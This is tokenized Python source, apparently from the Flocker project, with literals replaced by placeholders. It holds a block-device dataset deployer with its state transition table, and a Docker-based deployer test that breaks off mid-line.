<EOL> dataset_id = self . dataset_id , <EOL> maximum_size = self . maximum_size , <EOL> metadata = self . metadata , <EOL> ) <EOL> def _create_volume ( self , deployer ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . block_device_api <EOL> profile_name = self . metadata . get ( PROFILE_METADATA_KEY ) <EOL> size = allocated_size ( allocation_unit = api . allocation_unit ( ) , <EOL> requested_size = self . maximum_size ) <EOL> if profile_name : <EOL> return ( <EOL> deployer . profiled_blockdevice_api . 
create_volume_with_profile ( <EOL> dataset_id = self . dataset_id , <EOL> size = size , <EOL> profile_name = profile_name <EOL> ) <EOL> ) <EOL> else : <EOL> return api . create_volume ( dataset_id = self . dataset_id , size = size ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . block_device_api <EOL> try : <EOL> check_for_existing_dataset ( api , self . dataset_id ) <EOL> except : <EOL> return fail ( ) <EOL> return self . _create_volume ( deployer ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class RegisterVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return REGISTER_BLOCKDEVICE ( <EOL> dataset_id = self . dataset_id , <EOL> block_device_id = self . blockdevice_id , <EOL> ) <EOL> def run ( self , deployer , state_persister ) : <EOL> return state_persister . record_ownership ( <EOL> dataset_id = self . dataset_id , <EOL> blockdevice_id = self . 
blockdevice_id , <EOL> ) <EOL> class IBlockDeviceAsyncAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def allocation_unit ( ) : <EOL> """<STR_LIT>""" <EOL> def compute_instance_id ( ) : <EOL> """<STR_LIT>""" <EOL> def create_volume ( dataset_id , size ) : <EOL> """<STR_LIT>""" <EOL> def destroy_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def attach_volume ( blockdevice_id , attach_to ) : <EOL> """<STR_LIT>""" <EOL> def detach_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def list_volumes ( ) : <EOL> """<STR_LIT>""" <EOL> def get_device_path ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> class IBlockDeviceAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def allocation_unit ( ) : <EOL> """<STR_LIT>""" <EOL> def compute_instance_id ( ) : <EOL> """<STR_LIT>""" <EOL> def create_volume ( dataset_id , size ) : <EOL> """<STR_LIT>""" <EOL> def destroy_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def attach_volume ( blockdevice_id , attach_to ) : <EOL> """<STR_LIT>""" <EOL> def detach_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def list_volumes ( ) : <EOL> """<STR_LIT>""" <EOL> def get_device_path ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> class ICloudAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def list_live_nodes ( ) : <EOL> """<STR_LIT>""" <EOL> def start_node ( node_id ) : <EOL> """<STR_LIT>""" <EOL> @ auto_threaded ( ICloudAPI , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class _SyncToThreadedAsyncCloudAPIAdapter ( PClass ) : <EOL> """<STR_LIT>""" <EOL> _reactor = field ( ) <EOL> _sync = field ( ) <EOL> _threadpool = field ( ) <EOL> class MandatoryProfiles ( Values ) : <EOL> """<STR_LIT>""" <EOL> GOLD = ValueConstant ( u'<STR_LIT>' ) <EOL> SILVER = ValueConstant ( u'<STR_LIT>' ) <EOL> BRONZE = ValueConstant ( u'<STR_LIT>' ) <EOL> DEFAULT = ValueConstant ( BRONZE . 
value ) <EOL> class IProfiledBlockDeviceAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def create_volume_with_profile ( dataset_id , size , profile_name ) : <EOL> """<STR_LIT>""" <EOL> @ implementer ( IProfiledBlockDeviceAPI ) <EOL> class ProfiledBlockDeviceAPIAdapter ( PClass ) : <EOL> """<STR_LIT>""" <EOL> _blockdevice_api = field ( <EOL> mandatory = True , <EOL> invariant = provides ( IBlockDeviceAPI ) , <EOL> ) <EOL> def create_volume_with_profile ( self , dataset_id , size , profile_name ) : <EOL> """<STR_LIT>""" <EOL> CREATE_VOLUME_PROFILE_DROPPED ( dataset_id = dataset_id , <EOL> profile_name = profile_name ) . write ( ) <EOL> return self . _blockdevice_api . create_volume ( dataset_id = dataset_id , <EOL> size = size ) <EOL> @ implementer ( IBlockDeviceAsyncAPI ) <EOL> @ auto_threaded ( IBlockDeviceAPI , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class _SyncToThreadedAsyncAPIAdapter ( PClass ) : <EOL> """<STR_LIT>""" <EOL> _reactor = field ( ) <EOL> _sync = field ( ) <EOL> _threadpool = field ( ) <EOL> @ classmethod <EOL> def from_api ( cls , block_device_api , reactor = None ) : <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> return cls ( <EOL> _sync = block_device_api , <EOL> _reactor = reactor , <EOL> _threadpool = reactor . getThreadPool ( ) , <EOL> ) <EOL> def log_list_volumes ( function ) : <EOL> """<STR_LIT>""" <EOL> counter = itertools . count ( <NUM_LIT:1> ) <EOL> def _count_calls ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> CALL_LIST_VOLUMES ( <EOL> function = function . __name__ , count = next ( counter ) <EOL> ) . write ( ) <EOL> return function ( * args , ** kwargs ) <EOL> return _count_calls <EOL> @ log_list_volumes <EOL> def check_for_existing_dataset ( api , dataset_id ) : <EOL> """<STR_LIT>""" <EOL> volumes = api . list_volumes ( ) <EOL> for volume in volumes : <EOL> if volume . 
dataset_id == dataset_id : <EOL> raise DatasetExists ( volume ) <EOL> @ log_list_volumes <EOL> def get_blockdevice_volume ( api , blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> for volume in api . list_volumes ( ) : <EOL> if volume . blockdevice_id == blockdevice_id : <EOL> return volume <EOL> raise UnknownVolume ( blockdevice_id ) <EOL> def _manifestation_from_volume ( volume ) : <EOL> """<STR_LIT>""" <EOL> dataset = Dataset ( <EOL> dataset_id = volume . dataset_id , <EOL> maximum_size = volume . size , <EOL> ) <EOL> return Manifestation ( dataset = dataset , primary = True ) <EOL> class RawState ( PClass ) : <EOL> """<STR_LIT>""" <EOL> compute_instance_id = field ( unicode , mandatory = True ) <EOL> _live_instances = pset_field ( unicode , optional = True ) <EOL> volumes = pvector_field ( BlockDeviceVolume ) <EOL> devices = pmap_field ( UUID , FilePath ) <EOL> system_mounts = pmap_field ( FilePath , FilePath ) <EOL> devices_with_filesystems = pset_field ( FilePath ) <EOL> def is_known_dead_instance ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> if self . _live_instances is None : <EOL> return False <EOL> return instance_id not in self . _live_instances <EOL> @ implementer ( ILocalState ) <EOL> class BlockDeviceDeployerLocalState ( PClass ) : <EOL> """<STR_LIT>""" <EOL> hostname = field ( type = unicode , mandatory = True ) <EOL> node_uuid = field ( type = UUID , mandatory = True ) <EOL> datasets = pmap_field ( UUID , DiscoveredDataset ) <EOL> def shared_state_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> manifestations = { } <EOL> paths = { } <EOL> devices = { } <EOL> nonmanifest_datasets = { } <EOL> for dataset in self . datasets . values ( ) : <EOL> dataset_id = dataset . dataset_id <EOL> if dataset . state == DatasetStates . MOUNTED : <EOL> manifestations [ unicode ( dataset_id ) ] = Manifestation ( <EOL> dataset = Dataset ( <EOL> dataset_id = dataset_id , <EOL> maximum_size = dataset . 
maximum_size , <EOL> ) , <EOL> primary = True , <EOL> ) <EOL> paths [ unicode ( dataset_id ) ] = dataset . mount_point <EOL> elif dataset . state in ( <EOL> DatasetStates . NON_MANIFEST , DatasetStates . ATTACHED , <EOL> DatasetStates . ATTACHED_NO_FILESYSTEM , <EOL> DatasetStates . ATTACHED_TO_DEAD_NODE , <EOL> ) : <EOL> nonmanifest_datasets [ unicode ( dataset_id ) ] = Dataset ( <EOL> dataset_id = dataset_id , <EOL> maximum_size = dataset . maximum_size , <EOL> ) <EOL> if dataset . state in ( <EOL> DatasetStates . MOUNTED , DatasetStates . ATTACHED , <EOL> DatasetStates . ATTACHED_NO_FILESYSTEM , <EOL> ) : <EOL> devices [ dataset_id ] = dataset . device_path <EOL> return ( <EOL> NodeState ( <EOL> uuid = self . node_uuid , <EOL> hostname = self . hostname , <EOL> manifestations = manifestations , <EOL> paths = paths , <EOL> devices = devices , <EOL> applications = None , <EOL> ) , <EOL> NonManifestDatasets ( <EOL> datasets = nonmanifest_datasets <EOL> ) , <EOL> ) <EOL> def _provides_IDatasetStateChangeFactory ( k , v ) : <EOL> return provides ( IDatasetStateChangeFactory ) ( v ) <EOL> class TransitionTable ( CheckedPMap ) : <EOL> """<STR_LIT>""" <EOL> __key_type__ = NamedConstant <EOL> class __value_type__ ( CheckedPMap ) : <EOL> __key_type__ = NamedConstant <EOL> __invariant__ = _provides_IDatasetStateChangeFactory <EOL> NOTHING_TO_DO = NoOp ( sleep = timedelta ( seconds = <NUM_LIT> ) ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class DoNothing ( PClass ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def from_state_and_config ( discovered_dataset , desired_dataset ) : <EOL> return NOTHING_TO_DO <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class Poll ( PClass ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def from_state_and_config ( discovered_dataset , desired_dataset ) : <EOL> return NoOp ( sleep = timedelta ( seconds = <NUM_LIT:3> ) ) <EOL> Desired = Discovered = DatasetStates <EOL> DATASET_TRANSITIONS = TransitionTable . 
create ( { <EOL> Desired . MOUNTED : { <EOL> Discovered . NON_EXISTENT : CreateBlockDeviceDataset , <EOL> Discovered . ATTACHED_ELSEWHERE : Poll , <EOL> Discovered . REGISTERED : Poll , <EOL> Discovered . UNREGISTERED : RegisterVolume , <EOL> Discovered . ATTACHED_NO_FILESYSTEM : CreateFilesystem , <EOL> Discovered . NON_MANIFEST : AttachVolume , <EOL> Discovered . ATTACHED : MountBlockDevice , <EOL> Discovered . ATTACHED_TO_DEAD_NODE : DetachVolume , <EOL> } , <EOL> Desired . NON_MANIFEST : { <EOL> Discovered . NON_EXISTENT : CreateBlockDeviceDataset , <EOL> Discovered . ATTACHED_ELSEWHERE : DoNothing , <EOL> Discovered . REGISTERED : DoNothing , <EOL> Discovered . UNREGISTERED : RegisterVolume , <EOL> Discovered . ATTACHED_NO_FILESYSTEM : DetachVolume , <EOL> Discovered . ATTACHED : DetachVolume , <EOL> Discovered . MOUNTED : UnmountBlockDevice , <EOL> Discovered . ATTACHED_TO_DEAD_NODE : DoNothing , <EOL> } , <EOL> Desired . DELETED : { <EOL> Discovered . NON_EXISTENT : DoNothing , <EOL> Discovered . ATTACHED_ELSEWHERE : DoNothing , <EOL> Discovered . NON_MANIFEST : DestroyVolume , <EOL> Discovered . REGISTERED : DoNothing , <EOL> Discovered . UNREGISTERED : RegisterVolume , <EOL> Discovered . ATTACHED_NO_FILESYSTEM : DetachVolume , <EOL> Discovered . ATTACHED : DetachVolume , <EOL> Discovered . MOUNTED : UnmountBlockDevice , <EOL> Discovered . ATTACHED_TO_DEAD_NODE : DetachVolume , <EOL> } , <EOL> } ) <EOL> del Desired , Discovered <EOL> @ implementer ( ICalculator ) <EOL> class BlockDeviceCalculator ( PClass ) : <EOL> """<STR_LIT>""" <EOL> transitions = field ( TransitionTable , mandatory = True , <EOL> factory = TransitionTable . create , <EOL> initial = DATASET_TRANSITIONS ) <EOL> def _calculate_dataset_change ( self , discovered_dataset , desired_dataset ) : <EOL> """<STR_LIT>""" <EOL> desired_state = ( desired_dataset . state <EOL> if desired_dataset is not None <EOL> else DatasetStates . NON_MANIFEST ) <EOL> discovered_state = ( discovered_dataset . 
state <EOL> if discovered_dataset is not None <EOL> else DatasetStates . NON_EXISTENT ) <EOL> if desired_state != discovered_state : <EOL> transition = self . transitions [ desired_state ] [ discovered_state ] <EOL> return transition . from_state_and_config ( <EOL> discovered_dataset = discovered_dataset , <EOL> desired_dataset = desired_dataset , <EOL> ) <EOL> else : <EOL> return NOTHING_TO_DO <EOL> def calculate_changes_for_datasets ( <EOL> self , discovered_datasets , desired_datasets <EOL> ) : <EOL> actions = [ ] <EOL> for dataset_id in set ( discovered_datasets ) | set ( desired_datasets ) : <EOL> desired_dataset = desired_datasets . get ( dataset_id ) <EOL> discovered_dataset = discovered_datasets . get ( dataset_id ) <EOL> actions . append ( self . _calculate_dataset_change ( <EOL> discovered_dataset = discovered_dataset , <EOL> desired_dataset = desired_dataset , <EOL> ) ) <EOL> return in_parallel ( changes = actions ) <EOL> @ implementer ( IDeployer ) <EOL> class BlockDeviceDeployer ( PClass ) : <EOL> """<STR_LIT>""" <EOL> hostname = field ( type = unicode , mandatory = True ) <EOL> node_uuid = field ( type = UUID , mandatory = True ) <EOL> block_device_api = field ( mandatory = True ) <EOL> _underlying_blockdevice_api = field ( mandatory = True , initial = None ) <EOL> _async_block_device_api = field ( mandatory = True , initial = None ) <EOL> mountroot = field ( type = FilePath , initial = FilePath ( b"<STR_LIT>" ) ) <EOL> block_device_manager = field ( initial = BlockDeviceManager ( ) ) <EOL> calculator = field ( <EOL> invariant = provides ( ICalculator ) , <EOL> mandatory = True , <EOL> initial = BlockDeviceCalculator ( ) , <EOL> ) <EOL> @ property <EOL> def profiled_blockdevice_api ( self ) : <EOL> """<STR_LIT>""" <EOL> if IProfiledBlockDeviceAPI . providedBy ( <EOL> self . _underlying_blockdevice_api ) : <EOL> return self . _underlying_blockdevice_api <EOL> if IProfiledBlockDeviceAPI . providedBy ( self . block_device_api ) : <EOL> return self . 
block_device_api <EOL> return ProfiledBlockDeviceAPIAdapter ( <EOL> _blockdevice_api = self . block_device_api <EOL> ) <EOL> @ property <EOL> def async_block_device_api ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _async_block_device_api is None : <EOL> return _SyncToThreadedAsyncAPIAdapter . from_api ( <EOL> self . block_device_api , <EOL> ) <EOL> return self . _async_block_device_api <EOL> @ log_list_volumes <EOL> def _discover_raw_state ( self ) : <EOL> """<STR_LIT>""" <EOL> api = self . block_device_api <EOL> compute_instance_id = api . compute_instance_id ( ) <EOL> volumes = api . list_volumes ( ) <EOL> system_mounts = { <EOL> mount . blockdevice : mount . mountpoint <EOL> for mount in self . block_device_manager . get_mounts ( ) <EOL> } <EOL> def is_existing_block_device ( dataset_id , path ) : <EOL> if isinstance ( path , FilePath ) and path . isBlockDevice ( ) : <EOL> return True <EOL> INVALID_DEVICE_PATH ( <EOL> dataset_id = dataset_id , invalid_value = path <EOL> ) . write ( _logger ) <EOL> return False <EOL> devices = { } <EOL> for volume in volumes : <EOL> dataset_id = volume . dataset_id <EOL> if volume . attached_to == compute_instance_id : <EOL> device_path = api . get_device_path ( volume . blockdevice_id ) <EOL> if is_existing_block_device ( dataset_id , device_path ) : <EOL> devices [ dataset_id ] = device_path <EOL> else : <EOL> pass <EOL> if ICloudAPI . providedBy ( self . _underlying_blockdevice_api ) : <EOL> live_instances = self . _underlying_blockdevice_api . list_live_nodes ( ) <EOL> else : <EOL> live_instances = None <EOL> result = RawState ( <EOL> compute_instance_id = compute_instance_id , <EOL> _live_instances = live_instances , <EOL> volumes = volumes , <EOL> devices = devices , <EOL> system_mounts = system_mounts , <EOL> devices_with_filesystems = [ <EOL> device for device in devices . values ( ) <EOL> if self . block_device_manager . has_filesystem ( device ) ] , <EOL> ) <EOL> DISCOVERED_RAW_STATE ( raw_state = result ) . 
write ( ) <EOL> return result <EOL> def discover_state ( self , cluster_state , persistent_state ) : <EOL> """<STR_LIT>""" <EOL> raw_state = self . _discover_raw_state ( ) <EOL> datasets = { } <EOL> for volume in raw_state . volumes : <EOL> dataset_id = volume . dataset_id <EOL> owning_blockdevice_id = persistent_state . blockdevice_ownership . get ( <EOL> dataset_id ) <EOL> if owning_blockdevice_id is None : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . UNREGISTERED , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> ) <EOL> elif volume . blockdevice_id != owning_blockdevice_id : <EOL> if volume . attached_to is not None : <EOL> UNREGISTERED_VOLUME_ATTACHED ( <EOL> dataset_id = dataset_id , <EOL> block_device_id = volume . blockdevice_id , <EOL> ) . write ( ) <EOL> elif dataset_id in raw_state . devices : <EOL> device_path = raw_state . devices [ dataset_id ] <EOL> mount_point = self . _mountpath_for_dataset_id ( <EOL> unicode ( dataset_id ) <EOL> ) <EOL> if ( <EOL> device_path in raw_state . system_mounts and <EOL> raw_state . system_mounts [ device_path ] == mount_point <EOL> ) : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . MOUNTED , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> device_path = device_path , <EOL> mount_point = mount_point , <EOL> ) <EOL> else : <EOL> if device_path in raw_state . devices_with_filesystems : <EOL> state = DatasetStates . ATTACHED <EOL> else : <EOL> state = DatasetStates . ATTACHED_NO_FILESYSTEM <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = state , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> device_path = device_path , <EOL> ) <EOL> else : <EOL> if volume . attached_to in ( None , raw_state . 
compute_instance_id ) : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . NON_MANIFEST , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> ) <EOL> else : <EOL> if raw_state . is_known_dead_instance ( volume . attached_to ) : <EOL> state = DatasetStates . ATTACHED_TO_DEAD_NODE <EOL> else : <EOL> state = DatasetStates . ATTACHED_ELSEWHERE <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = state , <EOL> dataset_id = dataset_id , <EOL> maximum_size = volume . size , <EOL> blockdevice_id = volume . blockdevice_id , <EOL> ) <EOL> for dataset_id , blockdevice_id in ( <EOL> persistent_state . blockdevice_ownership . items ( ) <EOL> ) : <EOL> if dataset_id not in datasets : <EOL> datasets [ dataset_id ] = DiscoveredDataset ( <EOL> state = DatasetStates . REGISTERED , <EOL> dataset_id = dataset_id , <EOL> blockdevice_id = blockdevice_id , <EOL> ) <EOL> local_state = BlockDeviceDeployerLocalState ( <EOL> node_uuid = self . node_uuid , <EOL> hostname = self . hostname , <EOL> datasets = datasets , <EOL> ) <EOL> return succeed ( local_state ) <EOL> def _mountpath_for_dataset_id ( self , dataset_id ) : <EOL> """<STR_LIT>""" <EOL> return self . mountroot . child ( dataset_id . encode ( "<STR_LIT:ascii>" ) ) <EOL> def _calculate_desired_for_manifestation ( self , manifestation ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = UUID ( manifestation . dataset . dataset_id ) <EOL> maximum_size = manifestation . dataset . maximum_size <EOL> if maximum_size is None : <EOL> maximum_size = int ( DEFAULT_DATASET_SIZE . bytes ) <EOL> common_args = { <EOL> '<STR_LIT>' : dataset_id , <EOL> '<STR_LIT>' : manifestation . dataset . metadata , <EOL> } <EOL> if manifestation . dataset . deleted : <EOL> return DesiredDataset ( <EOL> state = DatasetStates . DELETED , <EOL> ** common_args <EOL> ) <EOL> else : <EOL> return DesiredDataset ( <EOL> state = DatasetStates . 
MOUNTED , <EOL> maximum_size = maximum_size , <EOL> mount_point = self . _mountpath_for_dataset_id ( <EOL> unicode ( dataset_id ) <EOL> ) , <EOL> ** common_args <EOL> ) <EOL> def _calculate_desired_state ( <EOL> self , configuration , local_applications , local_datasets <EOL> ) : <EOL> not_in_use = NotInUseDatasets ( <EOL> node_uuid = self . node_uuid , <EOL> local_applications = local_applications , <EOL> leases = configuration . leases , <EOL> ) <EOL> this_node_config = configuration . get_node ( <EOL> self . node_uuid , hostname = self . hostname ) <EOL> desired_datasets = { <EOL> UUID ( manifestation . dataset . dataset_id ) : <EOL> self . _calculate_desired_for_manifestation ( <EOL> manifestation <EOL> ) <EOL> for manifestation in this_node_config . manifestations . values ( ) <EOL> } <EOL> not_in_use_datasets = set ( not_in_use ( local_datasets . values ( ) ) ) <EOL> for dataset_id , dataset in local_datasets . items ( ) : <EOL> if dataset in not_in_use_datasets : <EOL> continue <EOL> if dataset . state != DatasetStates . MOUNTED : <EOL> continue <EOL> desired_datasets [ dataset_id ] = DesiredDataset ( <EOL> dataset_id = dataset_id , <EOL> state = DatasetStates . MOUNTED , <EOL> maximum_size = dataset . maximum_size , <EOL> metadata = { } , <EOL> mount_point = self . _mountpath_for_dataset_id ( <EOL> unicode ( dataset_id ) <EOL> ) , <EOL> ) <EOL> return desired_datasets <EOL> def calculate_changes ( self , configuration , cluster_state , local_state ) : <EOL> local_node_state = cluster_state . get_node ( self . node_uuid , <EOL> hostname = self . hostname ) <EOL> desired_datasets = self . _calculate_desired_state ( <EOL> configuration = configuration , <EOL> local_applications = local_node_state . applications , <EOL> local_datasets = local_state . datasets , <EOL> ) <EOL> return self . calculator . calculate_changes_for_datasets ( <EOL> discovered_datasets = local_state . 
datasets , <EOL> desired_datasets = desired_datasets , <EOL> ) <EOL> class ProcessLifetimeCache ( proxyForInterface ( IBlockDeviceAPI , "<STR_LIT>" ) ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , api ) : <EOL> self . _api = api <EOL> self . _instance_id = None <EOL> self . _device_paths = { } <EOL> def compute_instance_id ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _instance_id is None : <EOL> self . _instance_id = self . _api . compute_instance_id ( ) <EOL> return self . _instance_id <EOL> def get_device_path ( self , blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> if blockdevice_id not in self . _device_paths : <EOL> self . _device_paths [ blockdevice_id ] = self . _api . get_device_path ( <EOL> blockdevice_id ) <EOL> return self . _device_paths [ blockdevice_id ] <EOL> def detach_volume ( self , blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> del self . _device_paths [ blockdevice_id ] <EOL> except KeyError : <EOL> pass <EOL> return self . _api . detach_volume ( blockdevice_id ) </s>
<s> """<STR_LIT>""" <EOL> from uuid import uuid4 <EOL> from pyrsistent import pmap , pvector , pset <EOL> from eliot import Message <EOL> from twisted . internet import reactor <EOL> from twisted . python . filepath import FilePath <EOL> from . . import ( <EOL> NodeLocalState , P2PManifestationDeployer , ApplicationNodeDeployer , <EOL> sequentially <EOL> ) <EOL> from ... common import loop_until <EOL> from ... control . _model import ( <EOL> Deployment , Application , DockerImage , Node , AttachedVolume , Link , <EOL> Manifestation , Dataset , DeploymentState , NodeState , <EOL> PersistentState , <EOL> ) <EOL> from . . _docker import DockerClient <EOL> from . . testtools import wait_for_unit_state , if_docker_configured <EOL> from ... testtools import ( <EOL> random_name , DockerImageBuilder , assertContainsAll , flaky , <EOL> AsyncTestCase , <EOL> ) <EOL> from ... volume . testtools import create_volume_service <EOL> from ... route import make_memory_network <EOL> from . . import run_state_change <EOL> from ... control . testtools import InMemoryStatePersister <EOL> class P2PNodeDeployer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , hostname , volume_service , docker_client = None , <EOL> network = None , node_uuid = None ) : <EOL> self . manifestations_deployer = P2PManifestationDeployer ( <EOL> hostname , volume_service , node_uuid = node_uuid ) <EOL> self . applications_deployer = ApplicationNodeDeployer ( <EOL> hostname , docker_client , network , node_uuid = node_uuid ) <EOL> self . hostname = hostname <EOL> self . node_uuid = node_uuid <EOL> self . volume_service = self . manifestations_deployer . volume_service <EOL> self . docker_client = self . applications_deployer . docker_client <EOL> self . network = self . applications_deployer . network <EOL> def discover_state ( self , cluster_state , persistent_state ) : <EOL> d = self . manifestations_deployer . 
discover_state ( <EOL> cluster_state , persistent_state = persistent_state ) <EOL> def got_manifestations_state ( manifestations_local_state ) : <EOL> manifestations_state = manifestations_local_state . node_state <EOL> app_discovery = self . applications_deployer . discover_state ( <EOL> DeploymentState ( nodes = { manifestations_state } ) , <EOL> persistent_state = PersistentState ( ) , <EOL> ) <EOL> def got_app_local_state ( app_local_state ) : <EOL> app_state = app_local_state . node_state <EOL> new_app_local_state = NodeLocalState ( <EOL> node_state = ( <EOL> app_state . evolver ( ) <EOL> . set ( "<STR_LIT>" , <EOL> manifestations_state . manifestations ) <EOL> . set ( "<STR_LIT>" , manifestations_state . paths ) <EOL> . set ( "<STR_LIT>" , <EOL> manifestations_state . devices ) . persistent ( ) ) ) <EOL> return new_app_local_state <EOL> app_discovery . addCallback ( got_app_local_state ) <EOL> return app_discovery <EOL> d . addCallback ( got_manifestations_state ) <EOL> return d <EOL> def calculate_changes ( self , configuration , cluster_state , local_state ) : <EOL> """<STR_LIT>""" <EOL> return sequentially ( changes = [ <EOL> self . applications_deployer . calculate_changes ( <EOL> configuration , cluster_state , local_state ) , <EOL> self . manifestations_deployer . calculate_changes ( <EOL> configuration , cluster_state , local_state ) , <EOL> ] ) <EOL> def change_node_state ( deployer , desired_configuration ) : <EOL> """<STR_LIT>""" <EOL> state_persister = InMemoryStatePersister ( ) <EOL> def converge ( ) : <EOL> d = deployer . discover_state ( <EOL> DeploymentState ( nodes = { <EOL> NodeState ( hostname = deployer . hostname , uuid = deployer . node_uuid , <EOL> applications = [ ] , <EOL> manifestations = { } , paths = { } , devices = { } ) , <EOL> } ) , <EOL> persistent_state = state_persister . get_state ( ) , <EOL> ) <EOL> def got_changes ( local_state ) : <EOL> changes = local_state . 
shared_state_changes ( ) <EOL> cluster_state = DeploymentState ( ) <EOL> for change in changes : <EOL> cluster_state = change . update_cluster_state ( cluster_state ) <EOL> return deployer . calculate_changes ( <EOL> desired_configuration , cluster_state , local_state ) <EOL> d . addCallback ( got_changes ) <EOL> d . addCallback ( lambda change : run_state_change ( <EOL> change , deployer = deployer , <EOL> state_persister = state_persister ) ) <EOL> return d <EOL> result = converge ( ) <EOL> result . addCallback ( lambda _ : converge ( ) ) <EOL> result . addCallback ( lambda _ : converge ( ) ) <EOL> return result <EOL> def find_unit ( units , unit_name ) : <EOL> Message . new ( <EOL> message_type = "<STR_LIT>" , <EOL> units = list ( unit . name for unit in units ) , desired_unit = unit_name <EOL> ) . write ( ) <EOL> for unit in units : <EOL> if unit . name == unit_name : <EOL> return unit <EOL> class DeployerTests ( AsyncTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ if_docker_configured <EOL> def test_environment ( self ) : <EOL> """<STR_LIT>""" <EOL> expected_variables = frozenset ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } . items ( ) ) <EOL> docker_dir = FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) <EOL> volume_service = create_volume_service ( self ) <EOL> image = DockerImageBuilder ( test = self , source_dir = docker_dir ) <EOL> d = image . build ( ) <EOL> def image_built ( image_name ) : <EOL> application_name = random_name ( self ) <EOL> docker_client = DockerClient ( ) <EOL> self . addCleanup ( docker_client . 
remove , application_name ) <EOL> deployer = P2PNodeDeployer ( <EOL> u"<STR_LIT:localhost>" , volume_service , docker_client , <EOL> make_memory_network ( ) , node_uuid = uuid4 ( ) ) <EOL> dataset = Dataset ( <EOL> dataset_id = unicode ( uuid4 ( ) ) , <EOL> metadata = pmap ( { "<STR_LIT:name>" : application_name } ) ) <EOL> manifestation = Manifestation ( dataset = dataset , primary = True ) <EOL> desired_state = Deployment ( nodes = frozenset ( [ <EOL> Node ( uuid = deployer . node_uuid , <EOL> applications = frozenset ( [ Application ( <EOL> name = application_name , <EOL> image = DockerImage . from_string ( <EOL> image_name ) , <EOL> environment = expected_variables , <EOL> volume = AttachedVolume ( <EOL> manifestation = manifestation , <EOL> mountpoint = FilePath ( '<STR_LIT>' ) , <EOL> ) , <EOL> links = frozenset ( ) , <EOL> ) ] ) , <EOL> manifestations = { <EOL> manifestation . dataset_id : manifestation } ) ] ) ) <EOL> return change_node_state ( deployer , desired_state ) <EOL> d . addCallback ( image_built ) <EOL> d . addCallback ( lambda _ : volume_service . enumerate ( ) ) <EOL> d . addCallback ( <EOL> lambda volumes : <EOL> list ( volumes ) [ <NUM_LIT:0> ] . get_filesystem ( ) . get_path ( ) . child ( b'<STR_LIT>' ) ) <EOL> def got_result_path ( result_path ) : <EOL> d = loop_until ( reactor , result_path . exists ) <EOL> d . addCallback ( lambda _ : result_path ) <EOL> return d <EOL> d . addCallback ( got_result_path ) <EOL> def started ( result_path ) : <EOL> contents = result_path . getContent ( ) <EOL> assertContainsAll ( <EOL> haystack = contents , <EOL> test_case = self , <EOL> needles = [ '<STR_LIT>' . format ( k , v ) <EOL> for k , v in expected_variables ] ) <EOL> d . 
